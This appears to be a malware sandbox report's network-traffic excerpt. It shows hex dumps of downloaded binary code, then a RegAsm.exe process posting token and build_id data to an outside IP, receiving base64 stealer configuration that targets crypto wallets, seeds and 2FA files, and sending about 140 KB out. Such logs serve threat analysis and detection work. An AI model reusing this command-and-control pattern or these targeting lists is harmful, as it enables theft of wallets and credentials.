                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e
                                                                                                                                                                                                                                          Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14
                                                                                                                                                                                                                                          Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68
                                                                                                                                                                                                                                          Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08
                                                                                                                                                                                                                                          Data Ascii: Fd8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9
                                                                                                                                                                                                                                          Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83
                                                                                                                                                                                                                                          Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                                                                                                                                          2024-10-02 12:43:46 UTC16384INData Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24
                                                                                                                                                                                                                                          Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          38192.168.2.65855549.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:49 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 1025
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:49 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFHDHIJDGCBAKFIEGHCBCont
                                                                                                                                                                                                                                          2024-10-02 12:43:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          39192.168.2.65855649.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFIEBKEHCAKFCBFIDAAKCont
                                                                                                                                                                                                                                          2024-10-02 12:43:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:51 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:51 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          40192.168.2.65855749.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:52 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DHCAAEBKEGHJKEBFHJDBCont
                                                                                                                                                                                                                                          2024-10-02 12:43:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:52 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                                                                                          Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          41192.168.2.65855849.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:53 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHD
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 461
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:53 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 47 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------KJDGIJECFIEBFIDHCGHDContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KJDGIJECFIEBFIDHCGHDCont
                                                                                                                                                                                                                                          2024-10-02 12:43:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:54 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          42192.168.2.65856049.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 139641
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------EGCBFIEHIEGCAAAKKKKECont
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 37 36 6c 2f 76 52 2f 77 41 6d 72 7a 4d 32 2f 77 42 32 66 71 6a 32 4d 69 2f 33 78 65 6a 50 4f 74 62 38 51 7a 36 76 61 61 66 5a 38 70 61 32 56 76 48 45 6b 65 66 76 4d 46 41 4c 48 38 75 50 61 70 66 44 32 75 50 59 77 33 6d 6c 7a 54 4e 48 59 33 38 5a 6a 64 67 66 39 55 78 47 41 2f 30 37 48 31 46 62 66 2f 43 71 74 63 2f 35 2b 39 4f 2f 37 2b 50 2f 41 50 45 55 66 38 4b 72 31 7a 2f 6e 37 30 37 2f 41 4c 2b 50 2f 77 44 45 56 54 78 47 44 35 50 5a 38 79 73 64 53 77 2b 4d 35 2f 61 63 72 75 61 48 67 37 78 42 4e 63 33 65 6c 61 46 65 35 4e 7a 5a 58 62 6d 4e 75 75 55 45 4d 6f 49 4a 39 69 51 50 70 39 4b 70 2b 4e 2f 2b 52 74 75 2f 39 32 50 2f 41 4e 41 57 74 54 77 76 34 42 31 62 52 66 45 64 70 71 4e 31 63 57 62 78 51 37 39 77 6a 64 79 33 4b 46 52 6a 4b 6a 31 48 65 73 76 78 76
                                                                                                                                                                                                                                          Data Ascii: 76l/vR/wAmrzM2/wB2fqj2Mi/3xejPOtb8Qz6vaafZ8pa2VvHEkefvMFALH8uPapfD2uPYw3mlzTNHY38Zjdgf9UxGA/07H1Fbf/Cqtc/5+9O/7+P/APEUf8Kr1z/n707/AL+P/wDEVTxGD5PZ8ysdSw+M5/acruaHg7xBNc3elaFe5NzZXbmNuuUEMoIJ9iQPp9Kp+N/+Rtu/92P/ANAWtTwv4B1bRfEdpqN1cWbxQ79wjdy3KFRjKj1Hesvxv
